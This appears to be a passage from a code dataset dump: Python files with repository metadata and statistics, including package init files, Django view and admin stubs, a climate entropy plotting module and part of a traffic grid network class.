| 206.729358 | 1,918 | 0.768944 | 8,926 | 45,067 | 3.77728 | 0.185301 | 0.198363 | 0.287312 | 0.370032 | 0.329072 | 0.32495 | 0.322547 | 0.318217 | 0.313709 | 0.313145 | 0 | 0.594637 | 0.041738 | 45,067 | 217 | 1,919 | 207.682028 | 0.186079 | 0.032951 | 0 | 0.171875 | 0 | 0.007813 | 0.02687 | 0.004593 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007813 | false | 0 | 0.03125 | 0 | 0.039063 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ffceb19ef7da19ffa35d2711e8eb8ba1e9dd5427 | 161 | py | Python | aws_parsecf/__init__.py | PritamDutt/aws-parsecf | 0a2f89b6af1ea49a05f8d888b1cc77fc958b69db | [
"MIT"
] | null | null | null | aws_parsecf/__init__.py | PritamDutt/aws-parsecf | 0a2f89b6af1ea49a05f8d888b1cc77fc958b69db | [
"MIT"
] | 1 | 2021-02-23T18:49:41.000Z | 2021-02-23T18:49:41.000Z | aws_parsecf/__init__.py | PritamDutt/aws-parsecf | 0a2f89b6af1ea49a05f8d888b1cc77fc958b69db | [
"MIT"
] | null | null | null | from aws_parsecf.common import UnknownValue
from aws_parsecf.loaders import load_json, loads_json, load_yaml
__all__ = ['load_json', 'loads_json', 'load_yaml']
| 32.2 | 64 | 0.807453 | 24 | 161 | 4.916667 | 0.5 | 0.118644 | 0.237288 | 0.288136 | 0.423729 | 0.423729 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099379 | 161 | 4 | 65 | 40.25 | 0.813793 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ffe7475253c9d59caf8a228bf03f730c2b380f9e | 194 | py | Python | utils/views.py | windVane369/meiduo | 6165e2b1fe42aa529b6eb6ca832e9fa67b7477d3 | [
"Apache-2.0"
] | null | null | null | utils/views.py | windVane369/meiduo | 6165e2b1fe42aa529b6eb6ca832e9fa67b7477d3 | [
"Apache-2.0"
] | null | null | null | utils/views.py | windVane369/meiduo | 6165e2b1fe42aa529b6eb6ca832e9fa67b7477d3 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from django.views import View
from django.contrib.auth.mixins import LoginRequiredMixin
class LoginRequiredView(LoginRequiredMixin, View):
    """Base class for views that require an authenticated (logged-in) user."""
| 21.555556 | 57 | 0.737113 | 21 | 194 | 6.809524 | 0.761905 | 0.13986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006024 | 0.14433 | 194 | 8 | 58 | 24.25 | 0.855422 | 0.164948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
fff0888c5c0b2e98e143679f0fa601b45e6bb1b6 | 27 | py | Python | wp_sorter/wp_sorter/__init__.py | sobeckley/Wallpaper_Sorter | 8694fd98c1604c7f1e162e897863a6612f980ec0 | [
"MIT"
] | null | null | null | wp_sorter/wp_sorter/__init__.py | sobeckley/Wallpaper_Sorter | 8694fd98c1604c7f1e162e897863a6612f980ec0 | [
"MIT"
] | null | null | null | wp_sorter/wp_sorter/__init__.py | sobeckley/Wallpaper_Sorter | 8694fd98c1604c7f1e162e897863a6612f980ec0 | [
"MIT"
] | null | null | null | from .wp_sorter import app
| 13.5 | 26 | 0.814815 | 5 | 27 | 4.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4b763746a3a21937c3730113ce8a6c286c62a9b1 | 205 | py | Python | example/categories/admin.py | LUKKIEN/django-cms-2.0 | 0600cc1a3f3636a867faf0afe3719539fee36d69 | [
"BSD-3-Clause"
] | 1 | 2016-05-09T09:33:41.000Z | 2016-05-09T09:33:41.000Z | example/categories/admin.py | alamierda09/django-cms-2.0 | 0aba7f465730ae9a975ea6fd0bf5cac1ba70022c | [
"BSD-3-Clause"
] | 1 | 2019-11-08T02:38:49.000Z | 2019-11-08T02:38:49.000Z | example/categories/admin.py | alamierda09/django-cms-2.0 | 0aba7f465730ae9a975ea6fd0bf5cac1ba70022c | [
"BSD-3-Clause"
] | null | null | null | from django.contrib import admin
from categories.models import Category
from reversion.admin import VersionAdmin
class CategoryAdmin(VersionAdmin):
    """Admin options for the Category model, with django-reversion history."""


admin.site.register(Category, CategoryAdmin)
| 20.5 | 44 | 0.829268 | 24 | 205 | 7.083333 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117073 | 205 | 9 | 45 | 22.777778 | 0.939227 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.166667 | 0.5 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
4b86b7331a42be828db61f050f2866d9f0333e03 | 29 | py | Python | ibtd/__init__.py | bwalshe/ibtd | 333f89c496927376db5ec3b1d5e47d9b39979f50 | [
"Apache-2.0"
] | null | null | null | ibtd/__init__.py | bwalshe/ibtd | 333f89c496927376db5ec3b1d5e47d9b39979f50 | [
"Apache-2.0"
] | null | null | null | ibtd/__init__.py | bwalshe/ibtd | 333f89c496927376db5ec3b1d5e47d9b39979f50 | [
"Apache-2.0"
] | null | null | null | from ibtd.graph import Graph
| 14.5 | 28 | 0.827586 | 5 | 29 | 4.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4ba6297427c1c3bde9089c3b1fee9e7137b74915 | 37 | py | Python | pre/test/mymodule.py | neenjaw/udemy-python-mega-course | ab1b31577542b510dc44e22e4cfc48515477af52 | [
"MIT"
] | null | null | null | pre/test/mymodule.py | neenjaw/udemy-python-mega-course | ab1b31577542b510dc44e22e4cfc48515477af52 | [
"MIT"
] | null | null | null | pre/test/mymodule.py | neenjaw/udemy-python-mega-course | ab1b31577542b510dc44e22e4cfc48515477af52 | [
"MIT"
] | null | null | null | def print_name(name):
print(name) | 18.5 | 21 | 0.702703 | 6 | 37 | 4.166667 | 0.5 | 0.72 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162162 | 37 | 2 | 22 | 18.5 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 0.5 | 1 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
4bb5d99e905c95bf72a6a123895675fc3e302de5 | 48 | py | Python | CursoEmVideo/Aula22/ex111/utilidades/dado/__init__.py | lucashsouza/Desafios-Python | abb5b11ebdfd4c232b4f0427ef41fd96013f2802 | [
"MIT"
] | null | null | null | CursoEmVideo/Aula22/ex111/utilidades/dado/__init__.py | lucashsouza/Desafios-Python | abb5b11ebdfd4c232b4f0427ef41fd96013f2802 | [
"MIT"
] | null | null | null | CursoEmVideo/Aula22/ex111/utilidades/dado/__init__.py | lucashsouza/Desafios-Python | abb5b11ebdfd4c232b4f0427ef41fd96013f2802 | [
"MIT"
] | null | null | null | from Aula22.ex111.utilidades import moeda, dado
| 24 | 47 | 0.833333 | 7 | 48 | 5.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 0.104167 | 48 | 1 | 48 | 48 | 0.813953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
29b09fdd57a8e24520dfb03285542bd371c64089 | 41 | py | Python | localization/__init__.py | jkennedyvz/DeepFaceLive | 274c20808da089eb7fc0fc0e8abe649379a29ffe | [
"MIT"
] | 4 | 2021-07-23T16:34:24.000Z | 2022-03-01T18:31:59.000Z | localization/__init__.py | jkennedyvz/DeepFaceLive | 274c20808da089eb7fc0fc0e8abe649379a29ffe | [
"MIT"
] | 1 | 2022-02-08T01:29:03.000Z | 2022-02-08T01:29:03.000Z | localization/__init__.py | jkennedyvz/DeepFaceLive | 274c20808da089eb7fc0fc0e8abe649379a29ffe | [
"MIT"
] | 1 | 2021-12-14T09:18:15.000Z | 2021-12-14T09:18:15.000Z | from .localization import Localization, L | 41 | 41 | 0.853659 | 5 | 41 | 7 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
29b332158283d8deb39d5af9b473c0cb8cc329d1 | 43 | py | Python | python-package/targeted/src/targeted/formula/__init__.py | kkholst/target | a63f3121efeae2c3441d7d2d2261fdf85038868e | [
"Apache-2.0"
] | 1 | 2021-09-17T19:01:21.000Z | 2021-09-17T19:01:21.000Z | python-package/targeted/src/targeted/formula/__init__.py | kkholst/target | a63f3121efeae2c3441d7d2d2261fdf85038868e | [
"Apache-2.0"
] | null | null | null | python-package/targeted/src/targeted/formula/__init__.py | kkholst/target | a63f3121efeae2c3441d7d2d2261fdf85038868e | [
"Apache-2.0"
] | null | null | null | from .riskreg import riskreg # noqa, F401
| 21.5 | 42 | 0.744186 | 6 | 43 | 5.333333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085714 | 0.186047 | 43 | 1 | 43 | 43 | 0.828571 | 0.232558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4b0385024e7499c318170d4ec0f61b629b8eccad | 5,146 | py | Python | src/visualization/climate/global_it.py | jejjohnson/2019_rbig_rs | 00df5c623d55895e0b43a4130bb6c601fae84890 | [
"MIT"
] | 2 | 2020-05-15T17:31:39.000Z | 2021-03-16T08:49:33.000Z | src/visualization/climate/global_it.py | jejjohnson/rbig_eo | 00df5c623d55895e0b43a4130bb6c601fae84890 | [
"MIT"
] | null | null | null | src/visualization/climate/global_it.py | jejjohnson/rbig_eo | 00df5c623d55895e0b43a4130bb6c601fae84890 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from typing import Optional
# Global matplotlib style: talk-sized seaborn fonts layered over "ggplot".
plt.style.use(["seaborn-talk", "ggplot"])
# Output directory for every figure produced by this module (machine-specific).
SAVEPATH = (
    "/home/emmanuel/projects/2020_rbig_rs/reports/figures/climate/amip/global/entropy/"
)
def plot_global_entropy(
    results_df: pd.DataFrame,
    base: str,
    cmip: str,
    normalized=True,
    log_mi=True,
    save=True,
) -> None:
    """Scatter-plot base vs CMIP entropy against the number of spatial features.

    Parameters
    ----------
    results_df : pd.DataFrame
        Must contain columns "base", "cmip", "spatial", "h_base", "h_cmip".
    base : str
        Reference dataset; only rows with ``base == base`` are plotted.
    cmip : str
        CMIP model; only rows with ``cmip == cmip`` are plotted.
    normalized : bool
        If True, divide both entropies by ``spatial ** 2`` before plotting.
    log_mi : bool
        Unused; kept only for interface compatibility with the other plotters.
    save : bool
        If True, write the figure to SAVEPATH; otherwise show it interactively.
    """
    # Work on a copy: normalization happens before subsetting, so without a
    # copy the column assignments would silently mutate the caller's dataframe.
    results_df = results_df.copy()

    if normalized:
        results_df["h_cmip"] = results_df["h_cmip"] / results_df["spatial"] ** 2
        results_df["h_base"] = results_df["h_base"] / results_df["spatial"] ** 2

    # subset to the requested base/cmip pair
    results_df = results_df[results_df["base"] == base]
    results_df = results_df[results_df["cmip"] == cmip]

    fig, ax = plt.subplots()

    sns.scatterplot(data=results_df, x="spatial", y="h_base", label=f"{base}", ax=ax)
    sns.scatterplot(data=results_df, x="spatial", y="h_cmip", label=f"{cmip}", ax=ax)
    ax.set_title(f"{base.upper()} vs CMIP: {cmip.upper()}")
    ax.set_xlabel("Spatial Features")
    ax.set_ylabel("Entropy, H")
    ax.legend()
    if save:
        savename = f"global_h_{base}_{cmip}.png"
        fig.savefig(SAVEPATH + savename)
    else:
        plt.show()
    return None
def plot_global_diff_entropy(
    results_df: pd.DataFrame,
    base: str,
    normalized: bool = True,
    log_mi: bool = False,
    save: bool = True,
) -> None:
    """Plot |h_cmip - h_base| against spatial features, one line per CMIP model.

    Parameters
    ----------
    results_df : pd.DataFrame
        Must contain columns "base", "cmip", "spatial", "h_base", "h_cmip".
    base : str
        Reference dataset; only rows with ``base == base`` are used.
    normalized : bool
        If True, divide both entropies by ``spatial ** 2`` before differencing.
    log_mi : bool
        If True, plot the natural log of the absolute difference.
    save : bool
        If True, write the figure to SAVEPATH; otherwise show it interactively.
    """
    # Copy the subset so the column assignments below never write through to
    # the caller's dataframe (assigning into a slice raises
    # SettingWithCopyWarning and may or may not mutate the input).
    results_copy = results_df[results_df["base"] == base].copy()

    if normalized:
        # per-dimension normalization: divide by number of grid points
        results_copy["h_base"] = results_copy["h_base"] / results_copy["spatial"] ** 2
        results_copy["h_cmip"] = results_copy["h_cmip"] / results_copy["spatial"] ** 2

    # absolute entropy difference per row
    results_copy["h_diff"] = np.abs(results_copy["h_cmip"] - results_copy["h_base"])

    if log_mi:
        results_copy["h_diff"] = np.log(results_copy["h_diff"])

    fig, ax = plt.subplots()
    sns.lineplot(
        ax=ax,
        data=results_copy,
        x="spatial",
        y="h_diff",
        hue="cmip",
        linewidth=6,
        marker="o",
    )
    plt.title(f"")
    plt.xlabel("Spatial Features", fontsize=20)
    plt.ylabel("Difference in Entropy", fontsize=20)
    plt.legend(ncol=2, bbox_to_anchor=(2.05, 1), fontsize=16)

    if save:
        savename = f"global_dh_{base}.png"
        fig.savefig(SAVEPATH + savename)
    else:
        plt.show()
    return None
def plot_global_mutual_info(
    results_df: pd.DataFrame,
    base: str,
    measure: str,
    cmip: Optional[str] = None,
    normalized=True,
    log_mi=True,
    save=True,
) -> None:
    """Line-plot a mutual-information measure vs the number of spatial features.

    Parameters
    ----------
    results_df : pd.DataFrame
        Must contain columns "base", "cmip", "spatial" and ``measure``.
    base : str
        Reference dataset; only rows with ``base == base`` are plotted.
    measure : str
        Column to plot on the y-axis (normalization only applies to "mi").
    cmip : str, optional
        If given, restrict to this CMIP model; otherwise one line per model.
    normalized : bool
        If True and ``measure == "mi"``, divide by ``spatial ** 2``.
    log_mi : bool
        If True, plot ``log10(1 + measure)`` to compress the dynamic range.
    save : bool
        If True, write the figure to SAVEPATH; otherwise show it
        interactively.  Note: the filename embeds ``cmip``, which may be None.
    """
    # Build the full row mask first, then copy once, so later column
    # assignments cannot mutate the caller's dataframe or raise
    # SettingWithCopyWarning.
    mask = results_df["base"] == base
    if cmip is not None:
        mask = mask & (results_df["cmip"] == cmip)
    results_df = results_df.loc[mask].copy()

    if normalized and measure == "mi":
        results_df[measure] = results_df[measure] / results_df["spatial"] ** 2

    if log_mi:
        # log10(1 + x) keeps zero values finite
        results_df[measure] = np.log10(1 + results_df[measure])

    fig, ax = plt.subplots()
    sns.lineplot(data=results_df, x="spatial", y=measure, hue="cmip", ax=ax)
    ax.set_xlabel("Spatial Features")
    ax.set_ylabel("Mutual Information")
    ax.legend()
    if save:
        savename = f"global_mi_{base}_{cmip}.png"
        fig.savefig(SAVEPATH + savename)
    else:
        plt.show()
    return None
def plot_global_diff_mutual_info(
    results_df: pd.DataFrame,
    base: str,
    normalized: bool = True,
    log_mi: bool = False,
    save: bool = True,
) -> None:
    """Plot |h_cmip - h_base| against spatial features, one line per CMIP model.

    NOTE(review): despite its name, this function is an exact duplicate of
    ``plot_global_diff_entropy`` and operates on the *entropy* columns
    ("h_base"/"h_cmip"), not on a mutual-information column — confirm whether
    it was intended to diff the "mi" measure instead.

    Parameters
    ----------
    results_df : pd.DataFrame
        Must contain columns "base", "cmip", "spatial", "h_base", "h_cmip".
    base : str
        Reference dataset; only rows with ``base == base`` are used.
    normalized : bool
        If True, divide both entropies by ``spatial ** 2`` before differencing.
    log_mi : bool
        If True, plot the natural log of the absolute difference.
    save : bool
        If True, write the figure to SAVEPATH; otherwise show it interactively.
    """
    # Copy the subset so the column assignments below never write through to
    # the caller's dataframe (assigning into a slice raises
    # SettingWithCopyWarning and may or may not mutate the input).
    results_copy = results_df[results_df["base"] == base].copy()

    if normalized:
        # per-dimension normalization: divide by number of grid points
        results_copy["h_base"] = results_copy["h_base"] / results_copy["spatial"] ** 2
        results_copy["h_cmip"] = results_copy["h_cmip"] / results_copy["spatial"] ** 2

    # absolute entropy difference per row
    results_copy["h_diff"] = np.abs(results_copy["h_cmip"] - results_copy["h_base"])

    if log_mi:
        results_copy["h_diff"] = np.log(results_copy["h_diff"])

    fig, ax = plt.subplots()
    sns.lineplot(
        ax=ax,
        data=results_copy,
        x="spatial",
        y="h_diff",
        hue="cmip",
        linewidth=6,
        marker="o",
    )
    plt.title(f"")
    plt.xlabel("Spatial Features", fontsize=20)
    plt.ylabel("Difference in Entropy", fontsize=20)
    plt.legend(ncol=2, bbox_to_anchor=(2.05, 1), fontsize=16)

    if save:
        savename = f"global_dh_{base}.png"
        fig.savefig(SAVEPATH + savename)
    else:
        plt.show()
    return None
| 29.073446 | 103 | 0.616984 | 707 | 5,146 | 4.287129 | 0.157001 | 0.109865 | 0.071264 | 0.059386 | 0.847575 | 0.82778 | 0.78357 | 0.750907 | 0.689211 | 0.637743 | 0 | 0.010545 | 0.226001 | 5,146 | 176 | 104 | 29.238636 | 0.750439 | 0.128255 | 0 | 0.753846 | 0 | 0.007692 | 0.146953 | 0.030018 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030769 | false | 0 | 0.038462 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d9a44ddda9d9bff29c980ddb97a74036b4cb1502 | 28 | py | Python | json_structure/__init__.py | fatalispm/json_structure | 216d844bff3be075ce9cd35d281ebc7b4fd63a4a | [
"MIT"
] | null | null | null | json_structure/__init__.py | fatalispm/json_structure | 216d844bff3be075ce9cd35d281ebc7b4fd63a4a | [
"MIT"
] | null | null | null | json_structure/__init__.py | fatalispm/json_structure | 216d844bff3be075ce9cd35d281ebc7b4fd63a4a | [
"MIT"
] | null | null | null | from .main import structure
| 14 | 27 | 0.821429 | 4 | 28 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 28 | 1 | 28 | 28 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d9f4d85d2635e0bceec6f5ce2862415e9eab3d76 | 81 | py | Python | colliflow/python/colliflow/modules/__init__.py | YodaEmbedding/colliflow | 524a9397878ce2e7dde6a4526a91f866c03fc3e7 | [
"MIT"
] | 1 | 2021-02-08T22:20:34.000Z | 2021-02-08T22:20:34.000Z | colliflow/python/colliflow/modules/__init__.py | YodaEmbedding/colliflow | 524a9397878ce2e7dde6a4526a91f866c03fc3e7 | [
"MIT"
] | null | null | null | colliflow/python/colliflow/modules/__init__.py | YodaEmbedding/colliflow | 524a9397878ce2e7dde6a4526a91f866c03fc3e7 | [
"MIT"
] | null | null | null | from .input import *
from .module import *
# from .tcp_server_subgraph import *
| 16.2 | 36 | 0.740741 | 11 | 81 | 5.272727 | 0.636364 | 0.344828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.17284 | 81 | 4 | 37 | 20.25 | 0.865672 | 0.419753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8a7d15fee43c2ee5916d2f9de0261c58d03a1edb | 65,515 | py | Python | flow/networks/grid_nxm.py | mepear/flow | 4fc6ceaf64ca522b5a5c4104a3098b20cf207dd4 | [
"MIT"
] | 1 | 2021-03-05T07:39:51.000Z | 2021-03-05T07:39:51.000Z | flow/networks/grid_nxm.py | mepear/flow | 4fc6ceaf64ca522b5a5c4104a3098b20cf207dd4 | [
"MIT"
] | 1 | 2021-09-13T02:16:02.000Z | 2021-09-13T02:16:02.000Z | flow/networks/grid_nxm.py | mepear/flow | 4fc6ceaf64ca522b5a5c4104a3098b20cf207dd4 | [
"MIT"
] | 1 | 2021-08-21T13:58:30.000Z | 2021-08-21T13:58:30.000Z | """Contains the traffic light grid scenario class."""
from flow.networks.base import Network
from flow.core.params import InitialConfig
from flow.core.params import TrafficLightParams, PersonParams
from collections import defaultdict
import numpy as np
# Required additional network parameters for GridnxmNetwork.  Keys missing
# from net_params.additional_params (other than the optional ones accepted
# by __init__) cause a KeyError at construction time.
ADDITIONAL_NET_PARAMS = {
    # dictionary of traffic light grid array data
    "grid_array": {
        # number of horizontal rows of edges
        "row_num": 3,
        # number of vertical columns of edges
        "col_num": 3,
        # length of inner edges in the traffic light grid network
        "inner_length": None,
        # length of outer edges in the traffic light grid network
        "outer_length": None,
        # split an edge into several sub-edges; the number of sub-edges
        "sub_edge_num": 1,
    },
    # number of lanes in the horizontal edges
    "horizontal_lanes": 1,
    # number of lanes in the vertical edges
    "vertical_lanes": 1,
    # speed limit for all edges, may be represented as a float value, or a
    # dictionary with separate values for vertical and horizontal lanes
    "speed_limit": {
        "horizontal": 35,
        "vertical": 35
    }
}
class GridnxmNetwork(Network):
"""Traffic Light Grid network class.
The traffic light grid network consists of m vertical lanes and n
horizontal lanes, with a total of nxm intersections where the vertical
and horizontal edges meet.
Requires from net_params:
* **grid_array** : dictionary of grid array data, with the following keys
* **row_num** : number of horizontal rows of edges
* **col_num** : number of vertical columns of edges
* **inner_length** : length of inner edges in traffic light grid network
* **horizontal_lanes** : number of lanes in the horizontal edges
* **vertical_lanes** : number of lanes in the vertical edges
* **speed_limit** : speed limit for all edges. This may be represented as a
float value, or a dictionary with separate values for vertical and
horizontal lanes.
Usage
-----
>>> from flow.core.params import NetParams
>>> from flow.core.params import VehicleParams
>>> from flow.core.params import InitialConfig
>>> from flow.networks import TrafficLightGridNetwork
>>>
>>> network = TrafficLightGridNetwork(
>>> name='grid',
>>> vehicles=VehicleParams(),
>>> net_params=NetParams(
>>> additional_params={
>>> 'grid_array': {
>>> 'row_num': 3,
>>> 'col_num': 2,
>>> 'inner_length': 500,
>>> 'sub_edge_num': 1,
>>> },
>>> 'horizontal_lanes': 1,
>>> 'vertical_lanes': 1,
>>> 'speed_limit': {
>>> 'vertical': 35,
>>> 'horizontal': 35
>>> }
>>> },
>>> )
>>> )
"""
    def __init__(self,
                 name,
                 vehicles,
                 net_params,
                 persons=PersonParams(),
                 initial_config=InitialConfig(),
                 traffic_lights=TrafficLightParams()):
        """Initialize an n*m traffic light grid network.

        Parameters
        ----------
        name : str
            name of the network (overwritten below with a fixed value)
        vehicles : VehicleParams
            vehicles to be placed in the network at the start of a rollout
        net_params : NetParams
            ``additional_params`` must supply every key of
            ADDITIONAL_NET_PARAMS except those listed in ``optional`` below
        persons : PersonParams
            persons to be placed in the network (empty by default)
        initial_config : InitialConfig
            initial configuration for vehicle placement
        traffic_lights : TrafficLightParams
            traffic light configuration for the intersections

        Raises
        ------
        KeyError
            if a non-optional key of ADDITIONAL_NET_PARAMS (or of its
            "grid_array" sub-dictionary) is missing from net_params

        NOTE(review): the mutable default arguments (PersonParams() etc.)
        are created once at class-definition time and shared across calls;
        this is only safe if those defaults are never mutated — confirm.
        """
        # keys that are allowed to be absent from additional_params
        optional = ["tl_logic", "outer_length"]
        for p in ADDITIONAL_NET_PARAMS.keys():
            if p not in net_params.additional_params and p not in optional:
                raise KeyError('Network parameter "{}" not supplied'.format(p))
        for p in ADDITIONAL_NET_PARAMS["grid_array"].keys():
            if p not in net_params.additional_params["grid_array"] and p not in optional:
                raise KeyError(
                    'Grid array parameter "{}" not supplied'.format(p))
        # retrieve all additional parameters
        # refer to the ADDITIONAL_NET_PARAMS dict for more documentation
        self.vertical_lanes = net_params.additional_params["vertical_lanes"]
        self.horizontal_lanes = net_params.additional_params[
            "horizontal_lanes"]
        # speed limit may be a single number; normalize it to the dict form
        self.speed_limit = net_params.additional_params["speed_limit"]
        if not isinstance(self.speed_limit, dict):
            self.speed_limit = {
                "horizontal": self.speed_limit,
                "vertical": self.speed_limit
            }
        self.grid_array = net_params.additional_params["grid_array"]
        self.row_num = self.grid_array["row_num"]
        self.col_num = self.grid_array["col_num"]
        self.inner_length = self.grid_array["inner_length"]
        # outer_length and sub_edge_num are optional (defaults: None / 1)
        self.outer_length = self.grid_array.get("outer_length", None)
        self.sub_edge_num = self.grid_array.get("sub_edge_num", 1)
        # specifies whether or not there will be traffic lights at the
        # intersections (False by default)
        self.use_traffic_lights = net_params.additional_params.get(
            "traffic_lights", False)
        # radius of the inner nodes (ie of the intersections)
        # self.inner_nodes_radius = 2.9 + 3.3 * max(self.vertical_lanes,
        #                                           self.horizontal_lanes)
        self.inner_nodes_radius = 0
        # total number of edges in the network
        self.num_edges = 4 * ((self.col_num + 1) * self.row_num + self.col_num)
        # name of the network (DO NOT CHANGE)
        self.name = "BobLoblawsLawBlog"
